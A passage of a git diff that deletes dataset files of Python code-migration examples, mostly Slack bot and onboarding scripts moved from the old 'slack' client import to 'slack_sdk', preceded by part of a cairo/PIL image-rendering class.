-                    sw, sh = handle.get_dimension_data()[:2]
-                    imagesurface = RecordingSurface(sw, sh)
-                    ctx = cairo.Context(imagesurface)
-                    handle.render_cairo(ctx)
-                elif os.path.splitext(path)[1].lower() == '.png':
-                    imagesurface = cairo.ImageSurface.create_from_png(path)
-                    sw = imagesurface.get_width()
-                    sh = imagesurface.get_height()
-                else:
-                    pixbuf = gtk.gdk.pixbuf_new_from_file(path)
-                    sw = pixbuf.get_width()
-                    sh = pixbuf.get_height()
-
-                    ''' create a new cairo surface to place the image on '''
-                    surface = cairo.ImageSurface(0, sw, sh)
-                    ''' create a context to the new surface '''
-                    ct = cairo.Context(surface)
-                    ''' create a GDK formatted Cairo context to the new Cairo native context '''
-                    ct2 = gtk.gdk.CairoContext(ct)
-                    ''' draw from the pixbuf to the new surface '''
-                    ct2.set_source_pixbuf(pixbuf, 0, 0)
-                    ct2.paint()
-                    ''' surface now contains the image in a Cairo surface '''
-                    imagesurface = ct2.get_target()
-                self._surface_cache[path] = sw, sh, imagesurface
-            else:
-                img = PILImage.open(StringIO(self.data))
-
-                if img.mode != 'RGBA':
-                    img = img.convert("RGBA")
-
-                sw, sh = img.size
-                # Would be nice to not have to do some of these conversions :-\
-                bgra_data = img.tostring('raw', 'BGRA', 0, 1)
-                bgra_array = array.array('B', bgra_data)
-                imagesurface = cairo.ImageSurface.create_for_data(bgra_array, cairo.FORMAT_ARGB32, sw, sh, sw*4)
-
-        if width is not None or height is not None:
-            if width:
-                wscale = float(width) / sw
-            else:
-                wscale = 1.0
-            if height:
-                hscale = float(height) / sh
-            else:
-                if width:
-                    hscale = wscale
-                else:
-                    hscale = 1.0
-            self._transform.scale(wscale, hscale)
-
-        self.width = width or sw
-        self.height = height or sh
-        self._imagesurface = imagesurface
-
-        self._deferred_render()
-
-
-    def _render(self, ctx):
-        if self.width and self.height:
-            # Go to initial point (CORNER or CENTER):
-            transform = self._call_transform_mode(self._transform)
-
-            ctx.set_matrix(self._transform)
-            ctx.translate(self.x, self.y)
-            ctx.set_source_surface(self._imagesurface)
-            ctx.paint()
-
-    def draw(self):
-        self._deferred_render()
-
-    def _get_center(self):
-        '''Returns the center point of the path, disregarding transforms.
- ''' - x = (self.x+self.width/2) - y = (self.y+self.height/2) - return (x,y) - center = property(_get_center) - - def copy(self): - p = self.__class__(self._bot, self.path, self.x, self.y, self.width, self.height) - _copy_attrs(self._bot, p, self.stateAttributes) - return p - - diff --git a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$blueprint$example.py.diff b/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$blueprint$example.py.diff deleted file mode 100644 index 81a2e40..0000000 --- a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$blueprint$example.py.diff +++ /dev/null @@ -1,38 +0,0 @@ -diff --git a/example/blueprint/example.py b/example/blueprint/example.py - index 9cac90d3a40897bad19dac49a05f2a183f9b10bb..813214e403c800722dd5a92449cb0a49b8b73abc 100644 - --- a/example/blueprint/example.py - +++ b/example/blueprint/example.py -@@ -1,15 +1,5 @@ --# ------------------ --# Only for running this script here --import logging --import sys --from os.path import dirname -- --sys.path.insert(1, f"{dirname(__file__)}/../..") --logging.basicConfig(level=logging.DEBUG) --# ------------------ -- - from slackeventsapi import SlackEventAdapter --from slack import WebClient -+from slack_sdk.web import WebClient - import os - - from flask import Flask, Blueprint -@@ -23,6 +13,16 @@ slack_events_adapter = SlackEventAdapter(slack_signing_secret, "/slack/events", - slack_bot_token = os.environ["SLACK_BOT_TOKEN"] - slack_client = WebClient(slack_bot_token) - -+# Example responder to bot mentions -+@slack_events_adapter.on("app_mention") -+def handle_mentions(event_data): -+ event = event_data["event"] -+ slack_client.chat_postMessage( -+ channel=event["channel"], -+ text=f"You said:\n>{event['text']}", -+ ) -+ -+ - # Example responder to greetings - @slack_events_adapter.on("message") - def handle_message(event_data): diff --git a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$blueprint$example.py.source.py b/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$blueprint$example.py.source.py deleted file mode 100644 index c2d5ca7..0000000 --- a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$blueprint$example.py.source.py +++ /dev/null @@ -1,55 +0,0 @@ -# ------------------ -# Only for running this script here -import logging -import sys -from os.path import dirname - -sys.path.insert(1, f"{dirname(__file__)}/../..") -logging.basicConfig(level=logging.DEBUG) -# ------------------ - -from slackeventsapi import SlackEventAdapter -from slack import WebClient -import os - -from flask import Flask, Blueprint -slack_events = Blueprint('slack_events', __name__) - -# Our app's Slack Event Adapter for receiving actions via the Events API -slack_signing_secret = os.environ["SLACK_SIGNING_SECRET"] -slack_events_adapter = SlackEventAdapter(slack_signing_secret, "/slack/events", slack_events) - -# Create a SlackClient for your bot to use for Web API requests -slack_bot_token = os.environ["SLACK_BOT_TOKEN"] -slack_client = WebClient(slack_bot_token) - -# Example responder to greetings -@slack_events_adapter.on("message") -def handle_message(event_data): - message = event_data["event"] - # If the incoming message contains "hi", then respond with a "Hello" message - if message.get("subtype") is None and "hi" in message.get('text'): - channel = message["channel"] - message = "Hello <@%s>! 
:tada:" % message["user"] - slack_client.chat_postMessage(channel=channel, text=message) - - -# Example reaction emoji echo -@slack_events_adapter.on("reaction_added") -def reaction_added(event_data): - event = event_data["event"] - emoji = event["reaction"] - channel = event["item"]["channel"] - text = ":%s:" % emoji - slack_client.chat_postMessage(channel=channel, text=text) - -# Error events -@slack_events_adapter.on("error") -def error_handler(err): - print("ERROR: " + str(err)) - - -app = Flask(__name__) -app.register_blueprint(slack_events) - -# FLASK_APP=example.py FLASK_ENV=development flask run --port 3000 \ No newline at end of file diff --git a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$blueprint$example.py.target.py b/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$blueprint$example.py.target.py deleted file mode 100644 index 445fd83..0000000 --- a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$blueprint$example.py.target.py +++ /dev/null @@ -1,55 +0,0 @@ -from slackeventsapi import SlackEventAdapter -from slack_sdk.web import WebClient -import os - -from flask import Flask, Blueprint -slack_events = Blueprint('slack_events', __name__) - -# Our app's Slack Event Adapter for receiving actions via the Events API -slack_signing_secret = os.environ["SLACK_SIGNING_SECRET"] -slack_events_adapter = SlackEventAdapter(slack_signing_secret, "/slack/events", slack_events) - -# Create a SlackClient for your bot to use for Web API requests -slack_bot_token = os.environ["SLACK_BOT_TOKEN"] -slack_client = WebClient(slack_bot_token) - -# Example responder to bot mentions -@slack_events_adapter.on("app_mention") -def handle_mentions(event_data): - event = event_data["event"] - slack_client.chat_postMessage( - channel=event["channel"], - text=f"You said:\n>{event['text']}", - ) - - -# Example responder to greetings -@slack_events_adapter.on("message") -def handle_message(event_data): - message = event_data["event"] - # If the incoming message contains "hi", then respond with a "Hello" message - if message.get("subtype") is None and "hi" in message.get('text'): - channel = message["channel"] - message = "Hello <@%s>! 
:tada:" % message["user"] - slack_client.chat_postMessage(channel=channel, text=message) - - -# Example reaction emoji echo -@slack_events_adapter.on("reaction_added") -def reaction_added(event_data): - event = event_data["event"] - emoji = event["reaction"] - channel = event["item"]["channel"] - text = ":%s:" % emoji - slack_client.chat_postMessage(channel=channel, text=text) - -# Error events -@slack_events_adapter.on("error") -def error_handler(err): - print("ERROR: " + str(err)) - - -app = Flask(__name__) -app.register_blueprint(slack_events) - -# FLASK_APP=example.py FLASK_ENV=development flask run --port 3000 \ No newline at end of file diff --git a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$current_app$main.py.diff b/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$current_app$main.py.diff deleted file mode 100644 index 16ba09c..0000000 --- a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$current_app$main.py.diff +++ /dev/null @@ -1,18 +0,0 @@ -diff --git a/example/current_app/main.py b/example/current_app/main.py - index 9cac90d3a40897bad19dac49a05f2a183f9b10bb..813214e403c800722dd5a92449cb0a49b8b73abc 100644 - --- a/example/current_app/main.py - +++ b/example/current_app/main.py -@@ -1,12 +1,5 @@ --# ------------------ --# Only for running this script here --import sys --from os.path import dirname --sys.path.insert(1, f"{dirname(__file__)}/../..") --# ------------------ -- - import os --from slack import WebClient -+from slack_sdk.web import WebClient - import logging - logging.basicConfig(level=logging.DEBUG) - diff --git a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$current_app$main.py.source.py b/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$current_app$main.py.source.py deleted file mode 100644 index 9fcd32c..0000000 --- a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$current_app$main.py.source.py +++ /dev/null @@ -1,49 +0,0 @@ -# ------------------ -# Only for running this script here -import sys -from os.path import dirname -sys.path.insert(1, f"{dirname(__file__)}/../..") -# ------------------ - -import os -from slack import WebClient -import logging -logging.basicConfig(level=logging.DEBUG) - -from flask import Flask - -app = Flask(__name__) - -with app.app_context(): - from test_module.slack_app import slack_events_adapter - - slack_bot_token = os.environ["SLACK_BOT_TOKEN"] - slack_client = WebClient(slack_bot_token) - - - @slack_events_adapter.on("message") - def handle_message(event_data): - message = event_data["event"] - if message.get("subtype") is None and "hi" in message.get('text'): - channel = message["channel"] - message = "Hi <@%s>! 
:tada:" % message["user"] - slack_client.chat_postMessage(channel=channel, text=message) - - - @slack_events_adapter.on("error") - def error_handler(err): - print("ERROR: " + str(err)) - -# (Terminal A) -# source env/bin/activate -# (env) $ export SLACK_BOT_TOKEN=xoxb-*** -# (env) $ export SLACK_SIGNING_SECRET=** -# (env) $ cd example/current_app -# (env) $ FLASK_APP=main.py FLASK_ENV=development flask run --port 3000 - -# (Terminal B) -# ngrok http 3000 - -# in Slack -# /invite @{your app's bot user} -# post a message "hi" in the channel diff --git a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$current_app$main.py.target.py b/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$current_app$main.py.target.py deleted file mode 100644 index 4094e08..0000000 --- a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$current_app$main.py.target.py +++ /dev/null @@ -1,42 +0,0 @@ -import os -from slack_sdk.web import WebClient -import logging -logging.basicConfig(level=logging.DEBUG) - -from flask import Flask - -app = Flask(__name__) - -with app.app_context(): - from test_module.slack_app import slack_events_adapter - - slack_bot_token = os.environ["SLACK_BOT_TOKEN"] - slack_client = WebClient(slack_bot_token) - - - @slack_events_adapter.on("message") - def handle_message(event_data): - message = event_data["event"] - if message.get("subtype") is None and "hi" in message.get('text'): - channel = message["channel"] - message = "Hi <@%s>! :tada:" % message["user"] - slack_client.chat_postMessage(channel=channel, text=message) - - - @slack_events_adapter.on("error") - def error_handler(err): - print("ERROR: " + str(err)) - -# (Terminal A) -# source env/bin/activate -# (env) $ export SLACK_BOT_TOKEN=xoxb-*** -# (env) $ export SLACK_SIGNING_SECRET=** -# (env) $ cd example/current_app -# (env) $ FLASK_APP=main.py FLASK_ENV=development flask run --port 3000 - -# (Terminal B) -# ngrok http 3000 - -# in Slack -# /invite @{your app's bot user} -# post a message "hi" in the channel diff --git a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$example.py.diff b/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$example.py.diff deleted file mode 100644 index eaaf9a9..0000000 --- a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$example.py.diff +++ /dev/null @@ -1,28 +0,0 @@ -diff --git a/example/example.py b/example/example.py - index 9cac90d3a40897bad19dac49a05f2a183f9b10bb..813214e403c800722dd5a92449cb0a49b8b73abc 100644 - --- a/example/example.py - +++ b/example/example.py -@@ -1,5 +1,5 @@ - from slackeventsapi import SlackEventAdapter --from slack import WebClient -+from slack_sdk.web import WebClient - import os - - # Our app's Slack Event Adapter for receiving actions via the Events API -@@ -10,6 +10,16 @@ slack_events_adapter = SlackEventAdapter(slack_signing_secret, "/slack/events") - slack_bot_token = os.environ["SLACK_BOT_TOKEN"] - slack_client = WebClient(slack_bot_token) - -+# Example responder to bot mentions -+@slack_events_adapter.on("app_mention") -+def handle_mentions(event_data): -+ event = event_data["event"] -+ slack_client.chat_postMessage( -+ channel=event["channel"], -+ text=f"You said:\n>{event['text']}", -+ ) -+ -+ - # Example responder to greetings - @slack_events_adapter.on("message") - def handle_message(event_data): diff --git a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$example.py.source.py 
b/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$example.py.source.py deleted file mode 100644 index 0669b43..0000000 --- a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$example.py.source.py +++ /dev/null @@ -1,40 +0,0 @@ -from slackeventsapi import SlackEventAdapter -from slack import WebClient -import os - -# Our app's Slack Event Adapter for receiving actions via the Events API -slack_signing_secret = os.environ["SLACK_SIGNING_SECRET"] -slack_events_adapter = SlackEventAdapter(slack_signing_secret, "/slack/events") - -# Create a SlackClient for your bot to use for Web API requests -slack_bot_token = os.environ["SLACK_BOT_TOKEN"] -slack_client = WebClient(slack_bot_token) - -# Example responder to greetings -@slack_events_adapter.on("message") -def handle_message(event_data): - message = event_data["event"] - # If the incoming message contains "hi", then respond with a "Hello" message - if message.get("subtype") is None and "hi" in message.get('text'): - channel = message["channel"] - message = "Hello <@%s>! :tada:" % message["user"] - slack_client.chat_postMessage(channel=channel, text=message) - - -# Example reaction emoji echo -@slack_events_adapter.on("reaction_added") -def reaction_added(event_data): - event = event_data["event"] - emoji = event["reaction"] - channel = event["item"]["channel"] - text = ":%s:" % emoji - slack_client.chat_postMessage(channel=channel, text=text) - -# Error events -@slack_events_adapter.on("error") -def error_handler(err): - print("ERROR: " + str(err)) - -# Once we have our event listeners configured, we can start the -# Flask server with the default `/events` endpoint on port 3000 -slack_events_adapter.start(port=3000) diff --git a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$example.py.target.py b/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$example.py.target.py deleted file mode 100644 index 3d8c2d5..0000000 --- a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$example.py.target.py +++ /dev/null @@ -1,50 +0,0 @@ -from slackeventsapi import SlackEventAdapter -from slack_sdk.web import WebClient -import os - -# Our app's Slack Event Adapter for receiving actions via the Events API -slack_signing_secret = os.environ["SLACK_SIGNING_SECRET"] -slack_events_adapter = SlackEventAdapter(slack_signing_secret, "/slack/events") - -# Create a SlackClient for your bot to use for Web API requests -slack_bot_token = os.environ["SLACK_BOT_TOKEN"] -slack_client = WebClient(slack_bot_token) - -# Example responder to bot mentions -@slack_events_adapter.on("app_mention") -def handle_mentions(event_data): - event = event_data["event"] - slack_client.chat_postMessage( - channel=event["channel"], - text=f"You said:\n>{event['text']}", - ) - - -# Example responder to greetings -@slack_events_adapter.on("message") -def handle_message(event_data): - message = event_data["event"] - # If the incoming message contains "hi", then respond with a "Hello" message - if message.get("subtype") is None and "hi" in message.get('text'): - channel = message["channel"] - message = "Hello <@%s>! 
:tada:" % message["user"] - slack_client.chat_postMessage(channel=channel, text=message) - - -# Example reaction emoji echo -@slack_events_adapter.on("reaction_added") -def reaction_added(event_data): - event = event_data["event"] - emoji = event["reaction"] - channel = event["item"]["channel"] - text = ":%s:" % emoji - slack_client.chat_postMessage(channel=channel, text=text) - -# Error events -@slack_events_adapter.on("error") -def error_handler(err): - print("ERROR: " + str(err)) - -# Once we have our event listeners configured, we can start the -# Flask server with the default `/events` endpoint on port 3000 -slack_events_adapter.start(port=3000) diff --git a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$working_with_proxy$example.py.diff b/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$working_with_proxy$example.py.diff deleted file mode 100644 index 371a353..0000000 --- a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$working_with_proxy$example.py.diff +++ /dev/null @@ -1,39 +0,0 @@ -diff --git a/example/working_with_proxy/example.py b/example/working_with_proxy/example.py - index 9cac90d3a40897bad19dac49a05f2a183f9b10bb..813214e403c800722dd5a92449cb0a49b8b73abc 100644 - --- a/example/working_with_proxy/example.py - +++ b/example/working_with_proxy/example.py -@@ -1,15 +1,5 @@ --# ------------------ --# Only for running this script here --import logging --import sys --from os.path import dirname -- --sys.path.insert(1, f"{dirname(__file__)}/../..") --logging.basicConfig(level=logging.DEBUG) --# ------------------ -- - from slackeventsapi import SlackEventAdapter --from slack import WebClient -+from slack_sdk.web import WebClient - import os - - slack_signing_secret = os.environ["SLACK_SIGNING_SECRET"] -@@ -21,6 +11,17 @@ proxy_info = "http://localhost:9000" - slack_bot_token = os.environ["SLACK_BOT_TOKEN"] - slack_client = WebClient(token=slack_bot_token, proxy=proxy_info) - -+# Example responder to bot mentions -+@slack_events_adapter.on("app_mention") -+def handle_mentions(event_data): -+ event = event_data["event"] -+ slack_client.chat_postMessage( -+ channel=event["channel"], -+ text=f"You said:\n>{event['text']}", -+ ) -+ -+ -+# Example responder to greetings - @slack_events_adapter.on("message") - def handle_message(event_data): - message = event_data["event"] diff --git a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$working_with_proxy$example.py.source.py b/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$working_with_proxy$example.py.source.py deleted file mode 100644 index 2f70ff7..0000000 --- a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$working_with_proxy$example.py.source.py +++ /dev/null @@ -1,65 +0,0 @@ -# ------------------ -# Only for running this script here -import logging -import sys -from os.path import dirname - -sys.path.insert(1, f"{dirname(__file__)}/../..") -logging.basicConfig(level=logging.DEBUG) -# ------------------ - -from slackeventsapi import SlackEventAdapter -from slack import WebClient -import os - -slack_signing_secret = os.environ["SLACK_SIGNING_SECRET"] -slack_events_adapter = SlackEventAdapter(slack_signing_secret, "/slack/events") - -# pip install proxy.py -# proxy --port 9000 --log-level d -proxy_info = "http://localhost:9000" -slack_bot_token = os.environ["SLACK_BOT_TOKEN"] -slack_client = WebClient(token=slack_bot_token, proxy=proxy_info) - -@slack_events_adapter.on("message") -def handle_message(event_data): - 
message = event_data["event"] - if message.get("subtype") is None and "hi" in message.get('text'): - channel = message["channel"] - message = "Hello <@%s>! :tada:" % message["user"] - slack_client.chat_postMessage(channel=channel, text=message) - - -@slack_events_adapter.on("reaction_added") -def reaction_added(event_data): - event = event_data["event"] - emoji = event["reaction"] - channel = event["item"]["channel"] - text = ":%s:" % emoji - slack_client.chat_postMessage(channel=channel, text=text) - -@slack_events_adapter.on("error") -def error_handler(err): - print("ERROR: " + str(err)) - -if __name__ == '__main__': - slack_events_adapter.start(port=3000) - -# ------------------------------- - -# (Terminal A) -# source env/bin/activate -# (env) $ export SLACK_BOT_TOKEN=xoxb-*** -# (env) $ export SLACK_SIGNING_SECRET=** -# (env) $ FLASK_ENV=development python example/working_with_proxy/example.py - -# (Terminal B) -# source env/bin/activate -# (env) $ proxy --port 9000 --log-level d - -# (Terminal C) -# ngrok http 3000 - -# in Slack -# /invite @{your app's bot user} -# post a message "hi" in the channel \ No newline at end of file diff --git a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$working_with_proxy$example.py.target.py b/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$working_with_proxy$example.py.target.py deleted file mode 100644 index e382605..0000000 --- a/v1/data/codefile/slackapi@python-slack-events-api__813214e__example$working_with_proxy$example.py.target.py +++ /dev/null @@ -1,66 +0,0 @@ -from slackeventsapi import SlackEventAdapter -from slack_sdk.web import WebClient -import os - -slack_signing_secret = os.environ["SLACK_SIGNING_SECRET"] -slack_events_adapter = SlackEventAdapter(slack_signing_secret, "/slack/events") - -# pip install proxy.py -# proxy --port 9000 --log-level d -proxy_info = "http://localhost:9000" -slack_bot_token = os.environ["SLACK_BOT_TOKEN"] -slack_client = WebClient(token=slack_bot_token, proxy=proxy_info) - -# Example responder to bot mentions -@slack_events_adapter.on("app_mention") -def handle_mentions(event_data): - event = event_data["event"] - slack_client.chat_postMessage( - channel=event["channel"], - text=f"You said:\n>{event['text']}", - ) - - -# Example responder to greetings -@slack_events_adapter.on("message") -def handle_message(event_data): - message = event_data["event"] - if message.get("subtype") is None and "hi" in message.get('text'): - channel = message["channel"] - message = "Hello <@%s>! 
:tada:" % message["user"] - slack_client.chat_postMessage(channel=channel, text=message) - - -@slack_events_adapter.on("reaction_added") -def reaction_added(event_data): - event = event_data["event"] - emoji = event["reaction"] - channel = event["item"]["channel"] - text = ":%s:" % emoji - slack_client.chat_postMessage(channel=channel, text=text) - -@slack_events_adapter.on("error") -def error_handler(err): - print("ERROR: " + str(err)) - -if __name__ == '__main__': - slack_events_adapter.start(port=3000) - -# ------------------------------- - -# (Terminal A) -# source env/bin/activate -# (env) $ export SLACK_BOT_TOKEN=xoxb-*** -# (env) $ export SLACK_SIGNING_SECRET=** -# (env) $ FLASK_ENV=development python example/working_with_proxy/example.py - -# (Terminal B) -# source env/bin/activate -# (env) $ proxy --port 9000 --log-level d - -# (Terminal C) -# ngrok http 3000 - -# in Slack -# /invite @{your app's bot user} -# post a message "hi" in the channel \ No newline at end of file diff --git a/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$app.py.diff b/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$app.py.diff deleted file mode 100644 index a762544..0000000 --- a/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$app.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/tutorial/PythOnBoardingBot/app.py b/tutorial/PythOnBoardingBot/app.py - index 2defee516b105112af592dc545a376a893345002..5f4d92a8048814fc4938753594e74d7cfc74c27a 100644 - --- a/tutorial/PythOnBoardingBot/app.py - +++ b/tutorial/PythOnBoardingBot/app.py -@@ -1,7 +1,7 @@ - import os - import logging - from flask import Flask --from slack import WebClient -+from slack_sdk.web import WebClient - from slackeventsapi import SlackEventAdapter - from onboarding_tutorial import OnboardingTutorial - diff --git a/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$app.py.source.py b/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$app.py.source.py deleted file mode 100644 index 6a76921..0000000 --- a/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$app.py.source.py +++ /dev/null @@ -1,147 +0,0 @@ -import os -import logging -from flask import Flask -from slack import WebClient -from slackeventsapi import SlackEventAdapter -from onboarding_tutorial import OnboardingTutorial - -# Initialize a Flask app to host the events adapter -app = Flask(__name__) -slack_events_adapter = SlackEventAdapter(os.environ["SLACK_SIGNING_SECRET"], "/slack/events", app) - -# Initialize a Web API client -slack_web_client = WebClient(token=os.environ['SLACK_BOT_TOKEN']) - -# For simplicity we'll store our app data in-memory with the following data structure. -# onboarding_tutorials_sent = {"channel": {"user_id": OnboardingTutorial}} -onboarding_tutorials_sent = {} - - -def start_onboarding(user_id: str, channel: str): - # Create a new onboarding tutorial. - onboarding_tutorial = OnboardingTutorial(channel) - - # Get the onboarding message payload - message = onboarding_tutorial.get_message_payload() - - # Post the onboarding message in Slack - response = slack_web_client.chat_postMessage(**message) - - # Capture the timestamp of the message we've just posted so - # we can use it to update the message after a user - # has completed an onboarding task. 
-    onboarding_tutorial.timestamp = response["ts"]
-
-    # Store the message sent in onboarding_tutorials_sent
-    if channel not in onboarding_tutorials_sent:
-        onboarding_tutorials_sent[channel] = {}
-    onboarding_tutorials_sent[channel][user_id] = onboarding_tutorial
-
-
-# ================ Team Join Event =============== #
-# When the user first joins a team, the type of the event will be 'team_join'.
-# Here we'll link the onboarding_message callback to the 'team_join' event.
-@slack_events_adapter.on("team_join")
-def onboarding_message(payload):
-    """Create and send an onboarding welcome message to new users. Save the
-    time stamp of this message so we can update this message in the future.
-    """
-    event = payload.get("event", {})
-
-    # Get the id of the Slack user associated with the incoming event
-    user_id = event.get("user", {}).get("id")
-
-    # Open a DM with the new user.
-    response = slack_web_client.im_open(user=user_id)
-    channel = response["channel"]["id"]
-
-    # Post the onboarding message.
-    start_onboarding(user_id, channel)
-
-
-# ============= Reaction Added Events ============= #
-# When a users adds an emoji reaction to the onboarding message,
-# the type of the event will be 'reaction_added'.
-# Here we'll link the update_emoji callback to the 'reaction_added' event.
-@slack_events_adapter.on("reaction_added")
-def update_emoji(payload):
-    """Update the onboarding welcome message after receiving a "reaction_added"
-    event from Slack. Update timestamp for welcome message as well.
-    """
-    event = payload.get("event", {})
-
-    channel_id = event.get("item", {}).get("channel")
-    user_id = event.get("user")
-
-    if channel_id not in onboarding_tutorials_sent:
-        return
-
-    # Get the original tutorial sent.
-    onboarding_tutorial = onboarding_tutorials_sent[channel_id][user_id]
-
-    # Mark the reaction task as completed.
-    onboarding_tutorial.reaction_task_completed = True
-
-    # Get the new message payload
-    message = onboarding_tutorial.get_message_payload()
-
-    # Post the updated message in Slack
-    updated_message = slack_web_client.chat_update(**message)
-
-    # Update the timestamp saved on the onboarding tutorial object
-    onboarding_tutorial.timestamp = updated_message["ts"]
-
-
-# =============== Pin Added Events ================ #
-# When a users pins a message the type of the event will be 'pin_added'.
-# Here we'll link the update_pin callback to the 'pin_added' event.
-@slack_events_adapter.on("pin_added")
-def update_pin(payload):
-    """Update the onboarding welcome message after receiving a "pin_added"
-    event from Slack. Update timestamp for welcome message as well.
-    """
-    event = payload.get("event", {})
-
-    channel_id = event.get("channel_id")
-    user_id = event.get("user")
-
-    # Get the original tutorial sent.
-    onboarding_tutorial = onboarding_tutorials_sent[channel_id][user_id]
-
-    # Mark the pin task as completed.
-    onboarding_tutorial.pin_task_completed = True
-
-    # Get the new message payload
-    message = onboarding_tutorial.get_message_payload()
-
-    # Post the updated message in Slack
-    updated_message = slack_web_client.chat_update(**message)
-
-    # Update the timestamp saved on the onboarding tutorial object
-    onboarding_tutorial.timestamp = updated_message["ts"]
-
-
-# ============== Message Events ============= #
-# When a user sends a DM, the event type will be 'message'.
-# Here we'll link the message callback to the 'message' event.
-@slack_events_adapter.on("message")
-def message(payload):
-    """Display the onboarding welcome message after receiving a message
-    that contains "start".
-    """
-    event = payload.get("event", {})
-
-    channel_id = event.get("channel")
-    user_id = event.get("user")
-    text = event.get("text")
-
-
-    if text and text.lower() == "start":
-        return start_onboarding(user_id, channel_id)
-
-
-if __name__ == "__main__":
-    logger = logging.getLogger()
-    logger.setLevel(logging.DEBUG)
-    logger.addHandler(logging.StreamHandler())
-    app.run(port=3000)
diff --git a/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$app.py.target.py b/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$app.py.target.py
deleted file mode 100644
index 9cdb9ba..0000000
--- a/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$app.py.target.py
+++ /dev/null
@@ -1,147 +0,0 @@
-import os
-import logging
-from flask import Flask
-from slack_sdk.web import WebClient
-from slackeventsapi import SlackEventAdapter
-from onboarding_tutorial import OnboardingTutorial
-
-# Initialize a Flask app to host the events adapter
-app = Flask(__name__)
-slack_events_adapter = SlackEventAdapter(os.environ["SLACK_SIGNING_SECRET"], "/slack/events", app)
-
-# Initialize a Web API client
-slack_web_client = WebClient(token=os.environ['SLACK_BOT_TOKEN'])
-
-# For simplicity we'll store our app data in-memory with the following data structure.
-# onboarding_tutorials_sent = {"channel": {"user_id": OnboardingTutorial}}
-onboarding_tutorials_sent = {}
-
-
-def start_onboarding(user_id: str, channel: str):
-    # Create a new onboarding tutorial.
-    onboarding_tutorial = OnboardingTutorial(channel)
-
-    # Get the onboarding message payload
-    message = onboarding_tutorial.get_message_payload()
-
-    # Post the onboarding message in Slack
-    response = slack_web_client.chat_postMessage(**message)
-
-    # Capture the timestamp of the message we've just posted so
-    # we can use it to update the message after a user
-    # has completed an onboarding task.
-    onboarding_tutorial.timestamp = response["ts"]
-
-    # Store the message sent in onboarding_tutorials_sent
-    if channel not in onboarding_tutorials_sent:
-        onboarding_tutorials_sent[channel] = {}
-    onboarding_tutorials_sent[channel][user_id] = onboarding_tutorial
-
-
-# ================ Team Join Event =============== #
-# When the user first joins a team, the type of the event will be 'team_join'.
-# Here we'll link the onboarding_message callback to the 'team_join' event.
-@slack_events_adapter.on("team_join")
-def onboarding_message(payload):
-    """Create and send an onboarding welcome message to new users. Save the
-    time stamp of this message so we can update this message in the future.
-    """
-    event = payload.get("event", {})
-
-    # Get the id of the Slack user associated with the incoming event
-    user_id = event.get("user", {}).get("id")
-
-    # Open a DM with the new user.
-    response = slack_web_client.im_open(user=user_id)
-    channel = response["channel"]["id"]
-
-    # Post the onboarding message.
-    start_onboarding(user_id, channel)
-
-
-# ============= Reaction Added Events ============= #
-# When a users adds an emoji reaction to the onboarding message,
-# the type of the event will be 'reaction_added'.
-# Here we'll link the update_emoji callback to the 'reaction_added' event.
-@slack_events_adapter.on("reaction_added")
-def update_emoji(payload):
-    """Update the onboarding welcome message after receiving a "reaction_added"
-    event from Slack. Update timestamp for welcome message as well.
-    """
-    event = payload.get("event", {})
-
-    channel_id = event.get("item", {}).get("channel")
-    user_id = event.get("user")
-
-    if channel_id not in onboarding_tutorials_sent:
-        return
-
-    # Get the original tutorial sent.
-    onboarding_tutorial = onboarding_tutorials_sent[channel_id][user_id]
-
-    # Mark the reaction task as completed.
-    onboarding_tutorial.reaction_task_completed = True
-
-    # Get the new message payload
-    message = onboarding_tutorial.get_message_payload()
-
-    # Post the updated message in Slack
-    updated_message = slack_web_client.chat_update(**message)
-
-    # Update the timestamp saved on the onboarding tutorial object
-    onboarding_tutorial.timestamp = updated_message["ts"]
-
-
-# =============== Pin Added Events ================ #
-# When a users pins a message the type of the event will be 'pin_added'.
